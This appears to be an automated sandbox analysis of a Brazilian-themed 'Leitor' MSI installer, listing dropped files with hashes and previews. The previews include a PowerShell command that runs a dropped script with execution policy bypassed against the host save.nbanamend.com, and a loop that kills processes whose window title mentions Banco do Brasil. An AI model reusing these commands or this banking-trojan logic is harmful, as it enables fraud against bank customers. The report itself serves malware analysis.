                                                Preview: network-status-version 3 microdesc.vote-status consensus.consensus-method 31.valid-after 2021-11-23 19:00:00.fresh-until 2021-11-23 20:00:00.valid-until 2021-11-23 22:00:00.voting-delay 300 300.client-versions 0.3.5.10,0.3.5.11,0.3.5.12,0.3.5.13,0.3.5.14,0.3.5.15,0.3.5.16,0.3.5.17,0.4.5.1-alpha,0.4.5.2-alpha,0.4.5.3-rc,0.4.5.4-rc,0.4.5.5-rc,0.4.5.6,0.4.5.7,0.4.5.8,0.4.5.9,0.4.5.10,0.4.5.11,0.4.6.1-alpha,0.4.6.2-alpha,0.4.6.3-rc,0.4.6.4-rc,0.4.6.5,0.4.6.6,0.4.6.7,0.4.6.8,0.4.7.1-alpha,0.4.7.2-alpha.server-versions 0.3.5.10,0.3.5.11,0.3.5.12,0.3.5.13,0.3.5.14,0.3.5.15,0.3.5.16,0.3.5.17,0.4.5.1-alpha,0.4.5.2-alpha,0.4.5.3-rc,0.4.5.4-rc,0.4.5.5-rc,0.4.5.6,0.4.5.7,0.4.5.8,0.4.5.9,0.4.5.10,0.4.5.11,0.4.6.1-alpha,0.4.6.2-alpha,0.4.6.3-rc,0.4.6.4-rc,0.4.6.5,0.4.6.6,0.4.6.7,0.4.6.8,0.4.7.1-alpha,0.4.7.2-alpha.known-flags Authority BadExit Exit Fast Guard HSDir NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid.recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=
                                                C:\Users\user\Documents\20211123\PowerShell_transcript.138727.E7hCd+VW.20211123210046.txt
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1283
                                                Entropy (8bit):5.209156692613863
                                                Encrypted:false
                                                SSDEEP:24:BxSA4DvBBEx2DOXvgKj7PWjhMX3Uu6W0HjeTKKjX4CIym1ZJXXOAoElRnxSAZOS:BZUv/EoO/gKPPWjhQUw0qDYB1ZuEllZ1
                                                MD5:AC4BB3947F06D943ED5FFD9A168A80E4
                                                SHA1:7A84BBFA678423C2E41181D3E69515EA4D7FB1B4
                                                SHA-256:5AE619625889E727226F056BED772ADE1136202860C3091CD9D2EAF511814993
                                                SHA-512:ADD038A513BBA60B5BD8BC0DE9C751FEA38DA457E28BA1A3D8F26A19F70A87019E73CD25CF3F596C2475331BD0E17756EF247AF9E7D6453898DF475974C75CEE
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .**********************..Windows PowerShell transcript start..Start time: 20211123210058..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 138727 (Microsoft Windows NT 10.0.17134.0)..Host Application: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\pssFF45.ps1 -propFile C:\Users\user\AppData\Local\Temp\msiFDAB.txt -scriptFile C:\Users\user\AppData\Local\Temp\scrFDAC.ps1 -scriptArgsFile C:\Users\user\AppData\Local\Temp\scrFDAD.txt -propSep :<->: -testPrefix _testValue...Process ID: 3492..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************...... Directory: C:\......Mode LastWriteTime Length Name..---- ------------- ----
                                                C:\Users\user\Documents\20211123\PowerShell_transcript.138727.VqQir04h.20211123210136.txt
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1398
                                                Entropy (8bit):5.1386794448694975
                                                Encrypted:false
                                                SSDEEP:24:BxSAVDvBBEx2DOXUWSBLWEUHjeTKKjX4CIym1ZJXS97lFSArxSArxxSA3ZDqeyCh:BZtv/EoOy4lqDYB1Zo97zVrj3MeyCbEs
                                                MD5:A23F301A69AE98A4E7D74A906AB460B8
                                                SHA1:90D370121CDCC1625761D36F80708E8E17D8691D
                                                SHA-256:66DE2E751B7C473054C84E7C3C12858222D896265B1B9271CD22581FAEA9BF27
                                                SHA-512:2970CFBBAD027589AB9E9C558BC2B102102EEE1BD6C4F0700A4EA648EC9A8D891967F8976196AF4E584E185B1122FFEA04451BFFBE1935E85771B9F9992B51F1
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .**********************..Windows PowerShell transcript start..Start time: 20211123210138..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 138727 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy ByPass -File C:\JQHPQS\QIZABC.ps1 C:\JQHPQS\QRROJT.exe save.nbanamend.com..Process ID: 7156..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211123210139..**********************..PS>CommandInvocation(QIZABC.ps1): "QIZABC.ps1"..**********************..Command start time: 20211123210322..**********************..PS>TerminatingError(Import-Module): "Windows PowerShell Workflow is not supported in a Wi
                                                C:\Users\user\Documents\20211123\PowerShell_transcript.138727.jQu8Ha_F.20211123210146.txt
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1307
                                                Entropy (8bit):5.377416899832415
                                                Encrypted:false
                                                SSDEEP:24:BxSA+DvBBEx2DOXU4pWMHjeTKKjX4CIym1ZJXjDNrqs5xLoXUeJ+IVRGYy:BZGv/EoOuMqDYB1ZdDN95xLoXU8+IDpy
                                                MD5:5D8E87A12F34D0DC45F60A95E632C046
                                                SHA1:4358475E80B15BBA15B5821BC8C5B3DCA76C94B5
                                                SHA-256:18FC0D405ACBFF2F4C66BCB7F7D51793FB46E240DA9CDF507493747CE8CAD1B1
                                                SHA-512:29076EF0F0A2C1D19DB760D5BD43CCD2C3D039D9A1EAEA25D4314496858E63FA1886CFE32C34EE05F9C28C672D4D6F79799E7BBFD73DB72CBD679800FDC7D3D9
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .**********************..Windows PowerShell transcript start..Start time: 20211124001657..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 138727 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Version 5.1 -s -NoLogo -NoProfile..Process ID: 6352..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211124001657..**********************..PS>...$capturerProcess = $null......for(;;) {....$processList = Get-Process | Select-Object Id,MainWindowTitle.......foreach($process in $processList) {.....$title = $process.MainWindowTitle.........if ($title -like "*Banco do Brasil*") {.........Stop-Process -Id $process.Id -
                                                C:\Windows\Installer\3ed8de.msi
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Code page: 1252, Revision Number: {2E1E2189-2426-4422-848B-7807DE130F24}, Number of Words: 10, Subject: Leitor, Author: Leitor, Name of Creating Application: Leitor (Evaluation Installer), Template: ;1046, Comments: 3D9D53ED-FA8C-4FAA-9F38-69FDFB88AED5 (Evaluation Installer), Title: Installation Database, Keywords: Installer, MSI, Database, Security: 0, Number of Pages: 200
                                                Category:dropped
                                                Size (bytes):6378496
                                                Entropy (8bit):7.868304383682033
                                                Encrypted:false
                                                SSDEEP:98304:s+QXPWTFcvpvyZYHAsmSdP33SfWww2wXaJ/Bci89ZaqN+rFzO4bj/y7dYWePRpwp:7Qex8NdP33SfWwwdKDFZj/QLePRpr3
                                                MD5:5BFE975A60A97C93175C935C6D621E04
                                                SHA1:5BC30F0F540A957D2CC489BBCE2C1A7F137069E0
                                                SHA-256:464FE77F576D8273564BB5B7976B381855D962017F4DA6B5A363AF78BF788799
                                                SHA-512:DEA24EE9D249D715C1DAC5976B4B023EB7C15E15B34A5BA31DB7D8542C96553F7F0DD33CF86F00759C71DCD5200941EB364E04409DD3193D3E2270D6DFFE1130
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ......................>...................b...........................................g...............................................................}............................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^...................................................................................{...j................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...r...k...l...m...n...o...p...q...y...s...t...u...v...w...x...|...z...
                                                C:\Windows\Installer\MSIDE8B.tmp
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):402912
                                                Entropy (8bit):6.383418705489423
                                                Encrypted:false
                                                SSDEEP:6144:6amX6Sncj+HgLWSngWleRJN6FDWat/BXAOiNVKaBZdPla:M6T+RSngWleF67XsV9ZdPla
                                                MD5:85B69B55118FFC36F03B4DB94F4DDC3D
                                                SHA1:F7239136CE15776F76E6567A7A361ED8272A1096
                                                SHA-256:E9E32CB36C162EF4527C725ADF76857439C26D1A5653A484CE4547B36471BB8E
                                                SHA-512:BFF8496048D727830A3E73DEA7BF0819E443BFEA3B35256AF04222434694F98DCFCDFEC837C5DDE6F6AE2C2C0C51372D15139E8B172888764D3A951D98C4DFCE
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........@ ..!N..!N..!N..JM..!N..JK.k!N.TJ..!N.TM..!N.TK.!N..JJ..!N..JH..!N..JO..!N..!O. N.vTG.!N.vTN..!N.vT...!N..!...!N.vTL..!N.Rich.!N.........................PE..L...(p.a.........."!.........(.......}.......................................P............@......................... ...................0........................A...9..p....................:.......9..@...............$............................text............................... ..`.rdata..............................@..@.data...............................@....rsrc...0...........................@..@.reloc...A.......B..................@..B........................................................................................................................................................................................................................................................................
                                                C:\Windows\Installer\MSIE17A.tmp
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):402912
                                                Entropy (8bit):6.383418705489423
                                                Encrypted:false
                                                SSDEEP:6144:6amX6Sncj+HgLWSngWleRJN6FDWat/BXAOiNVKaBZdPla:M6T+RSngWleF67XsV9ZdPla
                                                MD5:85B69B55118FFC36F03B4DB94F4DDC3D
                                                SHA1:F7239136CE15776F76E6567A7A361ED8272A1096
                                                SHA-256:E9E32CB36C162EF4527C725ADF76857439C26D1A5653A484CE4547B36471BB8E
                                                SHA-512:BFF8496048D727830A3E73DEA7BF0819E443BFEA3B35256AF04222434694F98DCFCDFEC837C5DDE6F6AE2C2C0C51372D15139E8B172888764D3A951D98C4DFCE
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........@ ..!N..!N..!N..JM..!N..JK.k!N.TJ..!N.TM..!N.TK.!N..JJ..!N..JH..!N..JO..!N..!O. N.vTG.!N.vTN..!N.vT...!N..!...!N.vTL..!N.Rich.!N.........................PE..L...(p.a.........."!.........(.......}.......................................P............@......................... ...................0........................A...9..p....................:.......9..@...............$............................text............................... ..`.rdata..............................@..@.data...............................@....rsrc...0...........................@..@.reloc...A.......B..................@..B........................................................................................................................................................................................................................................................................
                                                C:\Windows\Installer\MSIE275.tmp
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):402912
                                                Entropy (8bit):6.383418705489423
                                                Encrypted:false
                                                SSDEEP:6144:6amX6Sncj+HgLWSngWleRJN6FDWat/BXAOiNVKaBZdPla:M6T+RSngWleF67XsV9ZdPla
                                                MD5:85B69B55118FFC36F03B4DB94F4DDC3D
                                                SHA1:F7239136CE15776F76E6567A7A361ED8272A1096
                                                SHA-256:E9E32CB36C162EF4527C725ADF76857439C26D1A5653A484CE4547B36471BB8E
                                                SHA-512:BFF8496048D727830A3E73DEA7BF0819E443BFEA3B35256AF04222434694F98DCFCDFEC837C5DDE6F6AE2C2C0C51372D15139E8B172888764D3A951D98C4DFCE
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........@ ..!N..!N..!N..JM..!N..JK.k!N.TJ..!N.TM..!N.TK.!N..JJ..!N..JH..!N..JO..!N..!O. N.vTG.!N.vTN..!N.vT...!N..!...!N.vTL..!N.Rich.!N.........................PE..L...(p.a.........."!.........(.......}.......................................P............@......................... ...................0........................A...9..p....................:.......9..@...............$............................text............................... ..`.rdata..............................@..@.data...............................@....rsrc...0...........................@..@.reloc...A.......B..................@..B........................................................................................................................................................................................................................................................................
                                                C:\Windows\Installer\MSIE39F.tmp
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):402912
                                                Entropy (8bit):6.383418705489423
                                                Encrypted:false
                                                SSDEEP:6144:6amX6Sncj+HgLWSngWleRJN6FDWat/BXAOiNVKaBZdPla:M6T+RSngWleF67XsV9ZdPla
                                                MD5:85B69B55118FFC36F03B4DB94F4DDC3D
                                                SHA1:F7239136CE15776F76E6567A7A361ED8272A1096
                                                SHA-256:E9E32CB36C162EF4527C725ADF76857439C26D1A5653A484CE4547B36471BB8E
                                                SHA-512:BFF8496048D727830A3E73DEA7BF0819E443BFEA3B35256AF04222434694F98DCFCDFEC837C5DDE6F6AE2C2C0C51372D15139E8B172888764D3A951D98C4DFCE
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........@ ..!N..!N..!N..JM..!N..JK.k!N.TJ..!N.TM..!N.TK.!N..JJ..!N..JH..!N..JO..!N..!O. N.vTG.!N.vTN..!N.vT...!N..!...!N.vTL..!N.Rich.!N.........................PE..L...(p.a.........."!.........(.......}.......................................P............@......................... ...................0........................A...9..p....................:.......9..@...............$............................text............................... ..`.rdata..............................@..@.data...............................@....rsrc...0...........................@..@.reloc...A.......B..................@..B........................................................................................................................................................................................................................................................................
                                                C:\Windows\Installer\MSIE601.tmp
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):3994
                                                Entropy (8bit):5.252306240933896
                                                Encrypted:false
                                                SSDEEP:48:u1VI5A4sUxk6x94j/fETDN/7a+EC6PAytbAMB+RX+umKrTG51XGOyw9OnUKK1:uc5ApZj/4q3IF+um8y51XGOH4w
                                                MD5:7D3C7DBA70779A78DF2C9EF83E9EA241
                                                SHA1:0F072F97838044D366B9AE72DAEA537A0B3F88FF
                                                SHA-256:A771457CA5CC3636C79F2E8BE99D8E71E168E57DB93C28B308292D1896572A8B
                                                SHA-512:798CFC47D6C6C3401A5A2E3188E1695302412A856EE51B6DE0D36B83F1454AA364F6826D776D613CFA163825701208F5C536E5DE4D1AC81F201DDBA692ACB45F
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ...@IXOS.@.....@..wS.@.....@.....@.....@.....@.....@......&.{06F68BF0-637D-4106-89BA-F09C8D12ADAA}..Leitor..YwZpT3p5Rh.msi.@.....@..-..@.....@........&.{2E1E2189-2426-4422-848B-7807DE130F24}.....@.....@.....@.....@.......@.....@.....@.......@......Leitor......Rollback..A.....o. .d.e. .r.e.s.t.a.u.r.a.....o.....RollbackCleanup..Removendo arquivos de backup..Arquivo: [1]...@.......@........ProcessComponents%.Atualizando o registro de componentes...@.....@.....@.]....&.{A01EEA68-8EB3-45E6-A279-AE2135F94188}..C:\ProgramData\Leitor\zlib1.dll.@.......@.....@.....@......&.{0786B0D2-2694-4535-8058-0D8685B9AAD7}..C:\ProgramData\Leitor\.@.......@.....@.....@......&.{CC477C94-8417-4703-8FC1-093E5F91DFCD}).C:\ProgramData\Leitor\libgcc_s_sjlj-1.dll.@.......@.....@.....@......&.{149D3DBD-9682-4CCE-8D17-5F80A80F4433}$.C:\ProgramData\Leitor\capturador.exe.@.......@.....@.....@......&.{4DB31090-FD14-4084-844F-1D28D846239A}+.C:\ProgramData\Leitor\capturador.exe.config.@.......@.....@.....@......&.{44339
                                                C:\Windows\Installer\MSIFCD8.tmp
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Category:modified
                                                Size (bytes):583136
                                                Entropy (8bit):6.548436673849084
                                                Encrypted:false
                                                SSDEEP:12288:6IcIRwUhwp7YWaUz4KnniqXhBmbq1x+BzYeqzdT8rd1yAvpPFIWsJkZ/DOoWwXiW:5HSiuTz+BzYeqzdT8Lvp+CZyzoiQ
                                                MD5:EEACF76535BBB010B9407D94288933DE
                                                SHA1:D30E40F531BB1074FE78595EF647B56B7C6609E4
                                                SHA-256:322023EEE9182800B4160C2B1E739D3E7850CC127DA9D2BD77E705CA5F2D2E56
                                                SHA-512:81F446CD0EC952DC9B28634D3C6BA94942967CAE5F5FCC84D336B1D0B4C19933CFE68FC6FE501374D101F5DC6048CD29B5171BB62C1EC56240A5539A07D75E99
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*l.en.y6n.y6n.y6zfz7c.y6zf|7..y6zf}7x.y6<x}7..y6<xz7y.y6_Q.6l.y6<x|77.y6zfx7}.y6n.x6b.y66xp7A.y66xy7o.y66x.6o.y6n..6o.y66x{7o.y6Richn.y6................PE..L......a.........."!.....|...`......9................................................(....@..........................T.......T..................................PT......p...............................@...............L............................text...({.......|.................. ..`.rdata..<...........................@..@.data........p.......T..............@....rsrc................p..............@..@.reloc..PT.......V...v..............@..B................................................................................................................................................................................................................................................................................
                                                C:\Windows\Installer\SourceHash{06F68BF0-637D-4106-89BA-F09C8D12ADAA}
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                Category:dropped
                                                Size (bytes):20480
                                                Entropy (8bit):1.1649419677260844
                                                Encrypted:false
                                                SSDEEP:12:JSbX72FjJ6AGiLIlHVRpZh/7777777777777777777777777vDHF+DZfVKit/l0G:JWQI5tcDZfNiF
                                                MD5:BD7BB8E2AB951F2B339DB2873F28A619
                                                SHA1:5932F273AB6C7824DFC952337A707E941EF178F6
                                                SHA-256:550CEFEDA0166CDE68B2F462122CEDE4BB43A4AC7FD2EB5747FA3FF11E68F189
                                                SHA-512:915548EA6D1DADF3289F2A2781774B2B2BE3C6B378461350A6D624F7951A8E26A81CEACC2CABBDDC669C0212BD9B493D991BEDADE1C60779271A38FA9DD92492
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                C:\Windows\Installer\inprogressinstallinfo.ipi
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                Category:dropped
                                                Size (bytes):20480
                                                Entropy (8bit):1.4761258337922827
                                                Encrypted:false
                                                SSDEEP:48:k8PhOuRc06WXJWjT5JhBgAErCyDSkPUSSkOTY:7hO1tjT3hJwCM/P
                                                MD5:D65CB5ECCDEAEB74A5865B2A937F6A7D
                                                SHA1:EFEE3203E27329A15DD16939C7FC49C5954AD294
                                                SHA-256:39E1FC2EF123B21370AFCD23E16671C4AD292CC0CB0A6A3B3DECCA210732DE60
                                                SHA-512:314B131837440F5777ADD63711435FD4A8D25F513EAF82A4B8EBA026AB94D7D6EC21ED4DA73C97C0A2BC507097E19662D2B1FE55F168577FF824DB6AE74244FD
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):81287
                                                Entropy (8bit):5.298743893900412
                                                Encrypted:false
                                                SSDEEP:192:XL/vcrZZDZo/ZrXczaIcO/gcMH5elWSLJ:XDvsDZGrkaIcO/Y5XuJ
                                                MD5:22956ED1ACD7ED830260CC4E2DF0A47B
                                                SHA1:27C4382062D2CA8654CBC64B3FACEE8B6DE16074
                                                SHA-256:2D8BA86F14259DE121DA0013C8086017D52F51A1AA10CC6AF7118C4DB504A2D1
                                                SHA-512:439536BCE961CAB3AA56211B8F310275C0382ADA8B3055994B19EB36AFEFD72D9CCA62FBEFE94CAF5E51ED47EE11D749A13C27AEAC03B6572B75B73B8884CDB1
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..07/23/2020 10:38:04.497 [4552]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.Office.Tools.Outlook, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 10:38:04.513 [4552]: ngen returning 0x00000000..07/23/2020 10:38:04.559 [4480]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.Office.Tools.Word, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 10:38:04.559 [4480]: ngen returning 0x00000000..07/23/2020 10:38:04.622 [4256]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.Office.Tools.Common.Implementation, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 10:38:04.622 [
                                                C:\Windows\Temp\~DF1E9A83E3A2317BA7.TMP
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                Category:dropped
                                                Size (bytes):20480
                                                Entropy (8bit):1.4761258337922827
                                                Encrypted:false
                                                SSDEEP:48:k8PhOuRc06WXJWjT5JhBgAErCyDSkPUSSkOTY:7hO1tjT3hJwCM/P
                                                MD5:D65CB5ECCDEAEB74A5865B2A937F6A7D
                                                SHA1:EFEE3203E27329A15DD16939C7FC49C5954AD294
                                                SHA-256:39E1FC2EF123B21370AFCD23E16671C4AD292CC0CB0A6A3B3DECCA210732DE60
                                                SHA-512:314B131837440F5777ADD63711435FD4A8D25F513EAF82A4B8EBA026AB94D7D6EC21ED4DA73C97C0A2BC507097E19662D2B1FE55F168577FF824DB6AE74244FD
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                C:\Windows\Temp\~DF3FC048FA2561951F.TMP
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                Category:dropped
                                                Size (bytes):32768
                                                Entropy (8bit):1.1900670988102102
                                                Encrypted:false
                                                SSDEEP:48:v8mGuEI+CFXJxT5bhBgAErCyDSkPUSSkOTY:EmGIZT1hJwCM/P
                                                MD5:10B9584EC31BCE6B421629A37B2D06BC
                                                SHA1:DC7110A3798AD71D859FEC300388DC91DD18023C
                                                SHA-256:2FA0B34CFA42954929FDE75B3EAFFEFD72A63593FD0573F6EFDFAE894AD12702
                                                SHA-512:1AC3EA680A499E3F2864B10DF2D8E08E6237B8C052494A816C4FC870E2A28CE7F08CC6BDFEA82CA9CEDB05573A6EDAB909D8BEA939831F05E8A807D1B3CC42FE
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                C:\Windows\Temp\~DF4C970C91E7D9735D.TMP
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                Category:dropped
                                                Size (bytes):32768
                                                Entropy (8bit):1.1900670988102102
                                                Encrypted:false
                                                SSDEEP:48:v8mGuEI+CFXJxT5bhBgAErCyDSkPUSSkOTY:EmGIZT1hJwCM/P
                                                MD5:10B9584EC31BCE6B421629A37B2D06BC
                                                SHA1:DC7110A3798AD71D859FEC300388DC91DD18023C
                                                SHA-256:2FA0B34CFA42954929FDE75B3EAFFEFD72A63593FD0573F6EFDFAE894AD12702
                                                SHA-512:1AC3EA680A499E3F2864B10DF2D8E08E6237B8C052494A816C4FC870E2A28CE7F08CC6BDFEA82CA9CEDB05573A6EDAB909D8BEA939831F05E8A807D1B3CC42FE
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                C:\Windows\Temp\~DF61AD31ED53F8E916.TMP
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                Category:dropped
                                                Size (bytes):32768
                                                Entropy (8bit):1.1900670988102102
                                                Encrypted:false
                                                SSDEEP:48:v8mGuEI+CFXJxT5bhBgAErCyDSkPUSSkOTY:EmGIZT1hJwCM/P
                                                MD5:10B9584EC31BCE6B421629A37B2D06BC
                                                SHA1:DC7110A3798AD71D859FEC300388DC91DD18023C
                                                SHA-256:2FA0B34CFA42954929FDE75B3EAFFEFD72A63593FD0573F6EFDFAE894AD12702
                                                SHA-512:1AC3EA680A499E3F2864B10DF2D8E08E6237B8C052494A816C4FC870E2A28CE7F08CC6BDFEA82CA9CEDB05573A6EDAB909D8BEA939831F05E8A807D1B3CC42FE
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                C:\Windows\Temp\~DF6778FD2489D73903.TMP
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):512
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3::
                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                C:\Windows\Temp\~DF92B7334624ABB5EE.TMP
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):512
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3::
                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                C:\Windows\Temp\~DF94DE3924A75DD634.TMP
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):32768
                                                Entropy (8bit):0.07156692297043304
                                                Encrypted:false
                                                SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKO+DIkyWfVWstgVky6lit/:2F0i8n0itFzDHF+DZfVDZit/
                                                MD5:02D5527BB4EA23BD9E4FB554CABBBD64
                                                SHA1:42B82651668375118A406A62B381B4F1AFFDFB17
                                                SHA-256:6967D2B74CC00FE72B47B8E1707CECA248E173E74FE35DEFFAB82EBA8470F65D
                                                SHA-512:B84719A096D943AEB12BC1D767923C962DDC937A9DAA08BD2B95E8316C227EDDDEAB91B567EED59252208FC006D35BC0119FD68C0E99850A56FB3C7443638E50
